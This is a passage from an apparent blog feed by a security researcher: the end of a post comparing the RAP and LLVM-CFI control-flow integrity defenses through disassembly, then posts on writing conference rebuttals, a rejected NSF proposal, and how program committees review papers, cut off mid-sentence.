&lt;pre class="code literal-block"&gt;
2181: 0f 31                 rdtsc
2183: 48 c1 e2 20           shl    $0x20,%rdx
2187: bb 00 ca 9a 3b        mov    $0x3b9aca00,%ebx
218c: 48 09 c2              or     %rax,%rdx
218f: 49 89 d6              mov    %rdx,%r14
2192: 66 0f 1f 44 00 00     nopw   0x0(%rax,%rax,1)
2198: 48 81 7d f8 a8 2f bd  cmpq   $0x17bd2fa8,-0x8(%rbp)
219f: 17
21a0: 75 61                 jne    2203 &amp;lt;speedfun+0x93&amp;gt;
21a2: 44 89 e6              mov    %r12d,%esi
21a5: 44 89 ef              mov    %r13d,%edi
21a8: ff d5                 callq  *%rbp
21aa: 48 83 eb 01           sub    $0x1,%rbx
21ae: 75 e8                 jne    2198 &amp;lt;speedfun+0x28&amp;gt;
21b0: 0f 31                 rdtsc
&lt;/pre&gt;
&lt;p&gt;We see how the type check is executed in each loop iteration through the &lt;tt class="docutils literal"&gt;cmpq&lt;/tt&gt;
instruction, dispatching after a successful comparison. The target in &lt;tt class="docutils literal"&gt;*%rbp&lt;/tt&gt;
directly points to the function &lt;tt class="docutils literal"&gt;quickfun&lt;/tt&gt;.&lt;/p&gt;
&lt;p&gt;LLVM-CFI reshuffles code quite a bit. The hot loop is compiled to:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
4013cc: 0f 31                 rdtsc
4013ce: 49 89 d6              mov    %rdx,%r14
4013d1: b9 18 15 40 00        mov    $0x401518,%ecx
4013d6: 49 39 cc              cmp    %rcx,%r12
4013d9: 75 79                 jne    401454 &amp;lt;main+0x244&amp;gt;
4013db: 49 c1 e6 20           shl    $0x20,%r14
4013df: 49 09 c6              or     %rax,%r14
4013e2: bb 00 ca 9a 3b        mov    $0x3b9aca00,%ebx
4013e7: 66 0f 1f 84 00 00 00  nopw   0x0(%rax,%rax,1)
4013ee: 00 00
4013f0: 44 89 ff              mov    %r15d,%edi
4013f3: 89 ee                 mov    %ebp,%esi
4013f5: 41 ff d4              callq  *%r12
4013f8: 48 ff cb              dec    %rbx
4013fb: 75 f3                 jne    4013f0 &amp;lt;main+0x1e0&amp;gt;
4013fd: 0f 31                 rdtsc
&lt;/pre&gt;
&lt;p&gt;Interestingly, the check itself is hoisted outside of the loop. The target
&lt;tt class="docutils literal"&gt;0x401518&lt;/tt&gt; contains a single jump to the real implementation of quickfun.&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
0000000000401518 &amp;lt;quickfun&amp;gt;:
401518: e9 03 fc ff ff        jmpq   401120 &amp;lt;quickfun.cfi&amp;gt;
40151d: cc                    int3
40151e: cc                    int3
40151f: cc                    int3
&lt;/pre&gt;
&lt;p&gt;LLVM-CFI implements the CFI check as a range check that maps into a table of
trampolines. All address-taken functions of the same type are placed next to
each other in a contiguous range of 8-byte aligned jump trampolines. A CFI
dispatch is checked against the trampoline range for the corresponding type and
then jumps through the matching trampoline to the real function. This double
indirection results in a 1 cycle penalty for each dispatch.&lt;/p&gt;
&lt;p&gt;Given this simple measurement on a single CPU, the RAP-style instrumentation is
about 1 cycle per dispatch faster than the LLVM-CFI based one. The LLVM-CFI
instrumentation has the advantage that all valid targets are tightly encoded in
a single table (which, incidentally, may also help a reverse engineer). There is no reason why
LLVM-CFI could not implement simple prototype-based checking that is encoded
inline next to the function as proposed in the original CFI paper.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;In summary, in the current implementations, RAP is slightly faster due to direct
encoding of target sets but LLVM-CFI is more precise by limiting indirect
dispatch to only address-taken functions. Both mechanisms implement a
prototype-based CFI policy.&lt;/p&gt;
&lt;p&gt;Looking at how easy it is to use LLVM-CFI and how complicated it is to use
RAP, I don't think any reasonable person would deploy RAP in their code:
compatibility and long-term maintainability are real concerns, as it is not
clear if or how RAP will be supported in the future. Also, I have no way of
knowing how complete the RAP plugin is or whether it is even the most recent
version, as PaXteam turned closed-source and no longer openly shares the plugin
(but offered to run my tests on his machine).&lt;/p&gt;
&lt;p&gt;I wonder why LLVM-CFI relies on a trampoline table to dispatch targets but does
not prepend each function with a type identifier. The double indirection for
LLVM-CFI seems excessive and unneeded.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://github.com/HexHive/mitiGate"&gt;Get the full code for the benchmark and play with it yourself&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="edits-corrections-and-updates"&gt;
&lt;h2&gt;Edits, corrections, and updates&lt;/h2&gt;
&lt;p&gt;The blog post initially claimed that there may be a TOCTTOU window against RAP.
This was a mistake that happened when reading the assembly.&lt;/p&gt;
&lt;p&gt;Added a note about the microbenchmark results.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Security"></category><category term="CFI"></category><category term="LLVM-CFI"></category><category term="RAP"></category></entry><entry><title>How not to alienate your reviewers, aka writing a decent rebuttal</title><link href="/blog/2018/0704-rebuttal.html" rel="alternate"></link><published>2018-07-04T18:31:00-04:00</published><updated>2018-07-04T18:31:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2018-07-04:/blog/2018/0704-rebuttal.html</id><summary type="html">&lt;p&gt;Assuming you have given everything to write the best and most beautiful paper
you can ever create, it is obvious that the reviewers must see your points and
therefore write you a favorable review with a recommendation of &lt;em&gt;strong accept&lt;/em&gt;.
Unfortunately, this is not always the case and reviewers may …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Assuming you have given everything to write the best and most beautiful paper
you can ever create, it is obvious that the reviewers must see your points and
therefore write you a favorable review with a recommendation of &lt;em&gt;strong accept&lt;/em&gt;.
Unfortunately, this is not always the case and reviewers may miss some points or
misunderstand some of your contributions.&lt;/p&gt;
&lt;p&gt;Many conferences have therefore introduced a rebuttal phase that allows authors
to respond to the (initial) set of reviews. The rebuttal is an opportunity to
clarify misunderstandings, answer questions the reviewers may have, or to expand
on a given point the reviewers complained about. There are many different
forms of rebuttals with slight twists. Generally, a rebuttal allows you to
discuss and clarify certain aspects in a review but it is not intended to add
new material, so keep it short and focused.&lt;/p&gt;
&lt;p&gt;Reviewing generally is not an adversarial setting and most reviewers are not
against you or against your research. Due to the increasing review burden, some
reviews may end up short or not as deep as you would have
wanted. The rebuttal is not the time to complain about such reviews.  As
mentioned above, the rebuttal serves the purpose to clarify and to respond to
the reviews. If you must complain about the reviews themselves, consider taking
it up with the PC chairs.&lt;/p&gt;
&lt;p&gt;Over time, I've settled on the following three step process to write rebuttals,
which helps me work through the reviews and to extract the points reviewers
raised.  I encourage my students to always write rebuttals even if a conference
is not using a rebuttal process. Rebuttals allow you to digest reviews and to
reflect on your paper from the reviewer's point of view, hopefully identifying
the weaknesses and, if the paper is not accepted, improving the paper for the next
submission.&lt;/p&gt;
&lt;div class="section" id="read-the-reviews"&gt;
&lt;h2&gt;Read the reviews&lt;/h2&gt;
&lt;p&gt;Reading reviews is an art. It is incredibly difficult to read between the
lines. Try to identify what annoyed the reviewer: where did they stop paying
attention? What is, according to their view, the main issue with the paper? What
are the shortcomings? Additionally, try to figure out what they liked and what
they think the strength of the paper is. Great reviews also contain a section
that highlights the path to acceptance, i.e., what the reviewer thinks needs to
change to get the paper accepted. If no such section is present, try to identify
what would have helped swing the reviewer in your favor.&lt;/p&gt;
&lt;p&gt;Reading reviews can be disturbing. You may ask yourself why reviewers did not
get a certain point as it was clearly discussed in the paper. After going
through the reviews, it is best to take some time off to digest the reviews,
allowing you to regain your objectivity.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="extract-the-main-criticisms-group-and-rank"&gt;
&lt;h2&gt;Extract the main criticisms, group, and rank&lt;/h2&gt;
&lt;p&gt;Start by marking the main criticisms in the reviews. Pay attention to the topics
identified in the first phase and highlight them. Scribble over the
reviews to highlight individual comments. In this second phase your goal is to
identify the main topics that need to be addressed. Creating an outline of these
main points can be helpful. As you are working through the reviews again and
again, start grouping the comments of individual reviewers based on topics, and
then rank the topics according to importance. If multiple reviewers brought up
the same points it may be crucial to clarify that aspect.&lt;/p&gt;
&lt;p&gt;An interesting question that often pops up is what aspects a rebuttal should
focus on. Should the ranking be purely technical, according to reviewer
expertise, or according to the review score? For example, is it better to
convince a non-expert with a weak accept to bump up their score or to clarify some
issues that an expert raised? I've heard many different approaches and each
approach has pros/cons. Also, having seen the process from the other side as a
reviewer, I cannot say if any given approach has advantages. In my rebuttals I
generally try to address the technical points, not focusing on individual
reviewers or experts too much. If an expert is strongly polarizing, it may be
worthwhile to highlight some misunderstanding or to keep the discussion of that
review short. But these issues quickly evolve into politics and may be best left
to people with more social skills.&lt;/p&gt;
&lt;p&gt;The key issue you likely want to avoid is alienating reviewers. Keep sarcasm,
irony, and other subtle forms of communication out of your rebuttal and stick to
technical facts. Try to clarify technical items and write in a way that gives
reviewers a way out to adjust their scores for the better. That is, instead of
writing &amp;quot;reviewer A is a moron who ignored our section 2.1 where we clearly
describe the design of our Flubb system&amp;quot; write something along the lines: &amp;quot;In
section 2.1 we describe how Flubb satisfies the Blubb assumption. We will
clarify these constraints based on reviewer A's feedback.&amp;quot; If a reviewer takes
the time to note a certain point as part of their review then they felt that
this was an issue and it is the author's job to clarify that issue. The reviewer
is not wrong but may have been misguided by the paper. Improving your writing
will make it easier for the reviewer to digest your points.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="formulating-a-response"&gt;
&lt;h2&gt;Formulating a response&lt;/h2&gt;
&lt;p&gt;Now that you are clear about the major (perceived) weaknesses of your paper and
after you have identified the main topics that need clarification, it is time to
write the actual rebuttal. I like to write the rebuttal based on topics and then
highlight which reviewers have raised that topic. Note that at a top tier PC,
reviewers have 20-25 papers on their stack and reading 25 rebuttals can be
taxing; make it easy for them to identify which parts address their points. Also
important: stick to the word limit. Many reviewers hate overlong rebuttals and
I've seen great rebuttals ignored because they were over (I've also seen rebuttals
that were 4x the allowed length). It is good form to start the rebuttal by
thanking the reviewers for their reviews and to highlight any general issues
such as that you plan to open source your implementation or to give a quick one
sentence introduction into the main topic.&lt;/p&gt;
&lt;p&gt;After the initial lead in you can dive into the individual points starting with
a quick introduction that summarizes the issue or question and an answer. Try to
keep the discussion short. You're not writing a new paper but are clarifying
some details. The rebuttal is not the place to introduce new topics but you may
mention that you have some additional results or to highlight certain
trade-offs.&lt;/p&gt;
&lt;p&gt;Generally, keep the tone polite. An aggressive rebuttal will rarely be read to
end and is not helpful in convincing the reviewers of your case. Snarky comments
or insults are not a good idea either.&lt;/p&gt;
&lt;p&gt;When you submit the rebuttal, note that HotCRP sends out an email with the
rebuttal to all the reviewers. As a reviewer, I've received several rebuttals
that were heavily modified after submission, followed by a couple of update
emails. It is generally in your interest to submit only the final version,
especially if earlier versions are not yet polished.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="edit"&gt;
&lt;h2&gt;Edit&lt;/h2&gt;
&lt;p&gt;Thanks to Nathan Burow for feedback on the article. I updated the discussion of
politics and rephrased the outline construction slightly.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Academia"></category><category term="rebuttal"></category><category term="publishing"></category><category term="review"></category></entry><entry><title>NSF TTP Proposal: Prototype Shepherding</title><link href="/blog/2018/0513-NSFTTP-prototype-shepherding.html" rel="alternate"></link><published>2018-05-13T17:05:00-04:00</published><updated>2018-05-13T17:05:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2018-05-13:/blog/2018/0513-NSFTTP-prototype-shepherding.html</id><summary type="html">&lt;p&gt;After serious advertising of the &lt;a class="reference external" href="https://www.nsf.gov/pubs/2017/nsf17576/nsf17576.htm"&gt;NSF TTP&lt;/a&gt; program at several
conferences throughout last year, I've decided to submit to the NSF TTP program
last fall.  The NSF TTP program is supposed to help transition research into
practice, either by forming a company to commercialize a prototype or by
developing a …&lt;/p&gt;</summary><content type="html">&lt;p&gt;After serious advertising of the &lt;a class="reference external" href="https://www.nsf.gov/pubs/2017/nsf17576/nsf17576.htm"&gt;NSF TTP&lt;/a&gt; program at several
conferences throughout last year, I've decided to submit to the NSF TTP program
last fall.  The NSF TTP program is supposed to help transition research into
practice, either by forming a company to commercialize a prototype or by
developing a full usable implementation of a research prototype.&lt;/p&gt;
&lt;p&gt;I thought to have identified a key issue with software security that I wanted to
address. At every security conference several papers will propose new
mitigations and sanitizers to protect against different forms of attack
vectors. These defenses are generally evaluated using some prototype
implementation, often on an old version of LLVM. Few academic defenses
are open sourced and even fewer (none?) are upstreamed or integrated into LLVM
itself, most are simply left to bit rot.  This poses two problems: usability and
maintainability.&lt;/p&gt;
&lt;p&gt;First, and most severe, these defenses don't drive the state of security
forward and are not usable. While they claim their little space in the academic
landscape, they will not be used in practice. To be usable, defenses must be
part of the core compiler platform such as LLVM-CFI or the different sanitizers.
Developers can use them by simply using a compiler switch.&lt;/p&gt;
&lt;p&gt;Second, if open-sourced, they often rely on an old obscure version of LLVM. If
the open-sourced prototype can be compiled at all, it will rely on an outdated
version of LLVM and may not even be compatible with recent software. For
example, compiling Google Chromium generally relies on the most recent head
version of LLVM and any older LLVM version will throw errors. Open-sourced
prototypes are generally not integrated into the LLVM development platform and
therefore will rot away quickly.&lt;/p&gt;
&lt;p&gt;These two problems are not necessarily a fault of academia. The job of academics
is to provide a reasonable working prototype that shows the feasibility of the
system for reasonable software. Providing a complete implementation for &lt;em&gt;any&lt;/em&gt;
software is usually too complex and upstreaming and maintaining the software
forever would incur too much overhead. A graduate student should rather work on
the next research problem than on maintaining code. Maintaining code and
upstreaming software is not part of the graduate job profile.&lt;/p&gt;
&lt;p&gt;The goal of my TTP proposal was to identify high profile mitigations and
sanitizers and turn them from research prototypes into usable defenses by
integrating them into the LLVM platform and making them available to the general
public. Following the idea of LLVM-CFI, the proposed mitigations focused on
control-flow hijacking and sanitization focused on type safety -- both important
and upcoming areas that have several gaps that need to be filled. For example,
while there are three concurrent type safety sanitizer prototypes, none of them
has been integrated and upstreamed into LLVM due to the long and difficult
upstreaming process.&lt;/p&gt;
&lt;p&gt;My thought was that getting sanitizers and mitigations into LLVM was a core
achievement that is reasonable in itself as a transition to practice exercise.
The upstreaming process takes a lot of time and resources, including
turning a research prototype into a full prototype, testing, code review, and
online discussion. Upstreaming makes a defense available to all developers at
the flick of a command switch. This by itself vastly increases the impact of a
given defense. For the proposal, I identified reasonable mitigations and
sanitizers and proposed a plan on how to get them into production. The core of
the proposal focused on the upstreaming process and guaranteeing code quality
with another part focusing on outreach such as speaking at LLVM developer
conferences, hacker conferences, and industry conferences to spread information
about the different sanitizers and mitigations -- with the goal of fitting into
the existing dissemination process.&lt;/p&gt;
&lt;p&gt;Today, I received the reviews and the proposal was ranked &lt;em&gt;low competitive&lt;/em&gt; and
not funded. The main points against the proposal were (and I quote):&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&amp;quot;While the goals of incorporating work into LLVM is certainly worthwhile and
potentially high impact, there is no target adopter that is identified in the
proposal, nor is there a milestone as to when an early adopter is to be
named.&amp;quot;&lt;/li&gt;
&lt;li&gt;&amp;quot;This is a technically sound proposal, but with a weak transition plan, which
is very important in the TTP program.&amp;quot;&lt;/li&gt;
&lt;li&gt;&amp;quot;The PI emphasized presenting at conferences as a key transition and outreach.
From the proposal itself, the PI also notes 'Many developers are not aware of
the current research (and do not care)'. These developers are not at key
conferences and do not care if they do attend. The proposal should identify
some more concrete activities to interact with this community.&amp;quot;&lt;/li&gt;
&lt;li&gt;&amp;quot;This transition to practice proposal has no supporting letters from any
industry collaborators.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The negative reviewers all point towards the lack of industry interaction and
want to see both a concrete plan on how to reach out to individual programmers
(programmers &lt;em&gt;using&lt;/em&gt; LLVM, not the LLVM developers) or industry letters. I
consider both of these comments unreasonable. LLVM is an open-source product and
therefore steered by the open-source community, industry letters are out of
scope. Still, LLVM is the main compiler used for many software systems (Google
and Apple use LLVM for all their platforms) and therefore high impact.&lt;/p&gt;
&lt;p&gt;In the proposal, I made the point that educating individual programmers (not
LLVM developers) was unreasonable as most programmers will not care about
security. The proposed approach was to convince LLVM maintainers that the
mitigations are reasonable, turning them on by default and thereby protecting
the general set of programmers. Reaching out to LLVM maintainers happens at LLVM
developer meetings which I proposed to attend.&lt;/p&gt;
&lt;p&gt;Orthogonally, the benefit of sanitizers can be emphasized by providing features
that help programmers during software development. Tutorials and testing
platforms will educate programmers and show them how to use these sanitizers to
test their code, thereby increasing security and making them more resilient
against attacks.&lt;/p&gt;
&lt;p&gt;Overall, I'm a little disappointed by the reviews. The reviewers focused
primarily on industry collaboration and commercialization; increasing the
security of an open-source compiler, and thereby of the programmers using it
and, through indirection, of all software products compiled by LLVM, seems to
be out of scope for an NSF SaTC transition to practice proposal.&lt;/p&gt;
&lt;p&gt;Let me add as a disclaimer that the NSF reviews are generally good, insightful,
and deep. The reviewers generally do a great job and the merit based review,
while harsh, provides a fair evaluation of the submitted proposals. A challenge
for these panels is the alignment and calibration across panels as the dynamic
can vastly differ from one panel to another. And, unfortunately, some reviews
are sub par.  What made me a little sad is that this was the second NSF proposal
that was rejected with two very short reviews. I'll include one in its full
length:
&lt;pre class="literal-block"&gt;
A strength is this proposal focuses on mitigations of Control Flow Hijacking
from C or C++ code bases which addresses an area that is vulnerable for many
current attack vectors. A further strength is the proposed further development
of a testing environment using open source.
A strength is that this proposal envisions regular outreach with developer and
compiler communities. A related weakness is a lack of concrete plans for
outreach other than for one international hacker conference. The outreach plan
would benefit from some re-thinking.
Very specifically deals with practices that can easily be taught in
universities. The team may want to explore if there are any synergies with the
Software Assurance Marketplace https://continuousassurance.org.
&lt;/pre&gt;
&lt;p&gt;This review has very little useful information. If I received such a review at
a conference, I'd complain. I've had several such NSF reviews. Having served on
NSF panels myself and serving on lots of program committees, seeing such reviews
makes me a little sad. Reviewing is part of the academic job profile. If you are
not willing (or able, due to other constraints) to do a good job, then
decline. But this discussion should be the topic of another blog post.&lt;/p&gt;
&lt;p&gt;In the spirit of sharing negative results, I figured that this rejection would
be a good example. I thought that the idea, enabling broad usage of academic
sanitizers and mitigations, was a great fit for the NSF SaTC TTP as it will
increase the security guarantees of our systems at large, indirectly by
protecting software compiled with the updated compiler.&lt;/p&gt;
&lt;p&gt;The lesson I learned from this TTP proposal is to explicitly state my
assumptions. For example, upstreaming into LLVM is a significant achievement
that indirectly allows all programmers to profit from new default defense
mechanisms. Another point is to clarify the use of open-source software and the
development practices used for open-source software. I'll also have to clarify
differences between academic conferences where new research is discussed,
developer conferences where new features such as sanitizers or mitigations are
discussed, and hacker conferences where applied usage of these tools is
discussed. NSF draws reviewers from different areas and not everyone will be
familiar with these different nuances and terms.&lt;/p&gt;
&lt;p&gt;As always, please send me comments, thoughts, and concerns. I'm always happy
to share proposals (both funded and unfunded) given reasonable requests.&lt;/p&gt;
</content><category term="Academia"></category><category term="NSF"></category><category term="proposal reviewing"></category></entry><entry><title>The PC Experience</title><link href="/blog/2018/0303-PCexperience.html" rel="alternate"></link><published>2018-03-03T19:03:00-05:00</published><updated>2018-03-03T19:03:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2018-03-03:/blog/2018/0303-PCexperience.html</id><summary type="html">&lt;p&gt;Program Committee (PC) meetings are this mysterious event where the fate of our
research projects is decided based on a review of our paper submission.
Especially for beginning researchers (i.e., PhD students) it is unclear
how the evaluation and review process actually works.  From a student's
perspective, a paper …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Program Committee (PC) meetings are this mysterious event where the fate of our
research projects is decided based on a review of our paper submission.
Especially for beginning researchers (i.e., PhD students) it is unclear
how the evaluation and review process actually works.  From a student's
perspective, a paper is -- in systems or security in computer science --
generally submitted to a conference after experiments and writing are completed.
How to efficiently focus on design, implementation, evaluation, and writing of a
paper is not straightforward and is worth a couple of other blog posts. While
others have discussed &lt;a class="reference external" href="https://people.inf.ethz.ch/troscoe/pubs/review-writing.pdf"&gt;how to review a paper&lt;/a&gt;, the discussion
process through which papers are evaluated to build a conference program is
somewhat opaque. This blog post tries to shed some light on this process and
the work of the PC, with some hints about what the PC chair does. The target
audience is PhD students who want to understand the process, and the post is
written from the viewpoint of a junior researcher who is selected to serve on
a conference PC for the first time.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2018/0303/brainstorm.png" /&gt;&lt;/p&gt;
&lt;div class="section" id="pc-selection"&gt;
&lt;h2&gt;PC selection&lt;/h2&gt;
&lt;p&gt;The PC chair (or chairs) is usually selected by the conference steering
committee. The chair and the steering committee then come up with a list of
potential PC members. To ensure that all topics and areas in the call for papers
are well covered, the list of PC members should be balanced according to
individual strengths and foci of the different PC members. The call for papers
is usually based on last year's edition, with tweaks to adapt to new topics and
changes in existing topics as the community evolves.&lt;/p&gt;
&lt;p&gt;After adding enough candidates to the PC pool, the candidates are ranked based
on different criteria such as (i) if they have served before, (ii) if they are
well known in the community/do they publish at the same conferences, (iii) if
they write reasonable reviews, and (iv) conference and committee politics.
Depending on the prestige of the conference and how well a chair can bully their
friends into serving (and the tone of the invitation email), more or less
people will agree to serve on the PC. The declined invitations can be filled
with people further down on the list in the same area to ensure good topic
coverage.&lt;/p&gt;
&lt;p&gt;The selection process continues until enough people have agreed to be on the PC.
The chair or steering committee (or web chair) publishes the list of PC members,
starts advertising the conference, and asks the PC members to advertise
and sometimes to submit papers as well.&lt;/p&gt;
&lt;p&gt;Another administrative task is the selection of the submission system. While
there are several systems, some are more or less friendly to the reviewers.
All have different advantages and disadvantages. My personal favorite is &lt;a class="reference external" href="https://www.hotcrp.com/"&gt;HotCRP&lt;/a&gt; which can either be used in its self-hosted
open-source version or in the fairly costly hosted version (where the conference
pays for each submitted paper). Alternatives are, e.g., &lt;a class="reference external" href="https://www.easychair.org"&gt;EasyChair&lt;/a&gt; or &lt;a class="reference external" href="https://www.openconf.com"&gt;OpenConf&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="paper-bidding"&gt;
&lt;h2&gt;Paper bidding&lt;/h2&gt;
&lt;p&gt;After the submission deadline has passed and all the papers are in the system,
the chairs generally work through all the papers to remove any papers that
violate format guidelines or are only half submitted. Afterwards PC members are
asked to bid for papers they want to review. In rare cases, the PC chair
directly assigns papers to reviewers, but this is less common.&lt;/p&gt;
&lt;p&gt;Remember how, as an author, you select from a list of topics when
submitting a paper. These topics allow a coarse selection based on interests.
PC members similarly mark their interests from the same list. On HotCRP, PC
members signal anything from strong interest to strong disinterest on a
per-topic basis. These topic-based interests are then used for an initial
ranking of the papers. If a PC member forgets to bid for papers, this topic
selection can serve as a crude proxy for their bids.&lt;/p&gt;
&lt;p&gt;As you enter preferences, consider how much you would like to review each
paper. Read the title, abstract, and keywords. Does this sound like a fun and
interesting paper in your area? Then go ahead and mark your interest. PC
members are asked to enter a bid between -20 and +20 to express disinterest or
interest in each individual paper. The bids are then normalized over all
reviewers. A special mark (-100) is often used to flag a potentially
forgotten conflict.&lt;/p&gt;
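To see why normalizing over reviewers matters, here is a minimal sketch of one possible scheme (a hypothetical illustration, not HotCRP's actual algorithm): each reviewer's bids are shifted to zero mean and scaled to unit spread, so an enthusiastic bidder who uses the whole -20 to +20 range and a conservative one who bids between -2 and +2 become comparable.

```python
def normalize_bids(bids):
    """Normalize one reviewer's raw bids (paper id -> bid in [-20, 20])
    to zero mean and unit spread. The conflict sentinel -100 is passed
    through untouched."""
    real = {p: b for p, b in bids.items() if b != -100}
    if not real:
        return dict(bids)
    mean = sum(real.values()) / len(real)
    var = sum((b - mean) ** 2 for b in real.values()) / len(real)
    spread = var ** 0.5 or 1.0  # avoid division by zero for constant bids
    out = {p: (b - mean) / spread for p, b in real.items()}
    out.update({p: b for p, b in bids.items() if b == -100})
    return out

# An enthusiastic and a conservative reviewer expressing the same ranking:
alice = normalize_bids({"paper1": 20, "paper2": 10, "paper3": -100})
bob = normalize_bids({"paper1": 2, "paper2": 1})
```

After normalization, both reviewers prefer paper1 over paper2 with identical relative weight, so the assignment algorithm can compare their bids directly.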
&lt;p&gt;The long list of papers can be daunting. All papers with a topic score
above 0 could be interesting, and you should at least check the title and
abstract. The lower the topic score, the less likely it is that you will enjoy
reviewing the paper. When entering bids, I sort the papers by topic ranking
from most to least interesting, displaying a detailed view with titles and
abstracts. After going through all papers, I sort them by my bids to check the
top papers again; those are the papers most likely to end up in my review
pile. Additionally, I often search for keywords that I know interest me to
ensure that I did not forget to bid on a particular paper. Think of this as a
whitelist to check against (I don't have a blacklist at the moment).&lt;/p&gt;
&lt;p&gt;After the end of the bidding phase, the PC chair assigns papers to individual PC
members, often in an automatic or semi-automatic way to reduce the amount of
reviewer pain and to maximize expertise for each paper. The reviewing systems
often provide several metrics and interfaces to carefully select and balance
reviewer workload, interests, and a fair set of reviewers per paper. Not every
paper will get a perfect set of reviewers. Sometimes a paper receives no bids
at all, and it is up to the discretion of the PC chair to select a lucky PC
member to review it. Not every PC member gets only their favorite papers to
review. This assignment process explains some of the low-expertise reviews;
alternatively, some PC members may not bid for papers, or they may misjudge
their expertise on a paper.&lt;/p&gt;
&lt;p&gt;Both as an author and as a reviewer, it is super important not to
underestimate the topic selection and bidding process. As an author, you set
the tone by providing a good set of topics that allows the reviewers to
quickly assess the generic area and contributions of your paper. As a
reviewer, the topic selection lets you decide which papers you want to focus
on when making your bid. Spend the majority of your bidding time on papers you
would actually want to review and make sure they interest you: you will spend
quite some time reading the papers and writing the reviews, so it should also
be fun!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="reviewing"&gt;
&lt;h2&gt;Reviewing&lt;/h2&gt;
&lt;p&gt;Reviewing is an art in itself and has been covered by several blog posts,
classes, and even technical reports. I personally skim the paper from
beginning to end to get an overview, then read it again while keeping detailed
notes. My review is then often split into a summary, a list of strengths, a
list of weaknesses, general comments, writing issues, and questions to the
authors. An important aspect is the discussion of novelty and how the paper
relates to existing work. If you think something is not novel, always make
sure to give references. The tone of the review is also important. Reviews are
blind, one-way communication: authors cannot respond, so as a reviewer it is
your job to provide context and as much information as possible to help the
authors improve their paper. Aggressive, angry, or insulting reviews are not
helpful in the review process. Stay friendly and helpful.&lt;/p&gt;
&lt;p&gt;When entering scores, make sure to normalize over the batch of papers you
received, as this allows an initial assessment relative to your batch. Note
that it is statistically highly unlikely that it's always you who gets the
worst batch of papers. Don't try to kill papers; stay positive. Search for the
novel nuggets and contributions that make a paper worthy of acceptance.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="pc-meeting"&gt;
&lt;h2&gt;PC meeting&lt;/h2&gt;
&lt;p&gt;PC meetings are either online or offline. At the PC meeting, the reviewers
argue about acceptance or rejection of each submitted paper, orchestrated by the
PC chair. Online PC meetings often use the discussion feature of the reviewing
system. The reviewers of a paper add comments and discuss pros and cons. Stay
active and involved for the papers you reviewed: follow up on questions from
other reviewers and defend the papers you want to argue for. Bring factual
arguments about novelty or why you think the paper should be accepted.&lt;/p&gt;
&lt;p&gt;If the PC meeting is onsite, be prepared for some extra fun. An onsite PC
meeting is usually 1-2 days and heavily orchestrated by the PC chair. The first
task for the chair is to decide the discussion order, i.e., in what sequence
papers will be discussed. There are several strategies with different
advantages and disadvantages. Some of the more common ones are: (i) random order
to keep reviewers arguing close to a baseline, (ii) front load good papers to
set the tone, with the potential drawback that the discussion turns negative as
&amp;quot;too many papers have already been accepted&amp;quot;, (iii) front load bad papers, or
(iv) minimize conflicts. Conflicted reviewers have to leave the room if a
conflicted paper is discussed. This can delay the discussion due to shuffling
people around and fetching them back into the room.&lt;/p&gt;
&lt;p&gt;Independent of the order, some or all papers will be discussed and each
discussed paper receives a slot of a couple of minutes. The discussion
lead first summarizes the paper and the highlights in the reviews. The merit of
the paper is then discussed by all the reviewers.  The PC chair often slightly
steers the discussion so that it stays on track and may table the discussion if
it takes too long, coming back to the paper later. If the reviewers cannot
agree on whether the paper should be accepted, other PC members can chime in
and, finally, vote on the merit of the paper.&lt;/p&gt;
&lt;p&gt;A practice that is becoming increasingly common is to add a note
summarizing the PC discussion to the reviews, which allows the authors to
better understand what aspects were discussed during the meeting, what the
reviewers think should be changed, and what they liked.&lt;/p&gt;
&lt;p&gt;Especially as a junior person, an important aspect of the onsite PC meeting is
networking. PC meetings are an awesome opportunity to discuss research questions
with senior colleagues or to get to know other people in the wider field. If you
can, take part in the onsite PC meeting even if it involves travel. It's usually
more compact than a conference and you get much more face time with your
colleagues.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="student-pc"&gt;
&lt;h2&gt;Student PC&lt;/h2&gt;
&lt;p&gt;Student PCs are a fairly recent approach that lets senior students
experience a mock PC. The student PC reviews the same (or sometimes a slightly
smaller) set of papers in as realistic a setting as possible. Such PCs are
often a great way to get to know other academics and to network with your
peers. The trade-off is the amount of work and the additional travel that take
time out of your schedule compared to working on your next research project.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="case-study-a-local-dry-run"&gt;
&lt;h2&gt;Case study: a local dry-run&lt;/h2&gt;
&lt;p&gt;A student PC may sometimes be too high a burden given the additional
travel, and especially for junior students the total overhead may not be worth
it. To allow my students to experience and understand the PC environment, we
conducted a mock Usenix Security PC last week. After receiving my batch of
Usenix Security papers, I played the role of PC chair and assigned my
interested students a set of papers to review. Orthogonally, I reviewed all
the papers myself to act as a discussion partner during the mock PC meeting.
We then shared all the reviews to prepare for an onsite discussion. Similar to
a real PC meeting, we had lots of caffeinated drinks and sugary food to stay
sharp.&lt;/p&gt;
&lt;p&gt;During our half-day PC meeting we worked through the set of papers, following
a random strategy. The students were the discussion leads as we discussed each
paper. When writing reviews, students often go through an interesting
development: at the beginning of their research career, they are overly positive
(this is the best paper I've ever seen) without considering related work. With
some research experience, they become overly negative (everything has been done
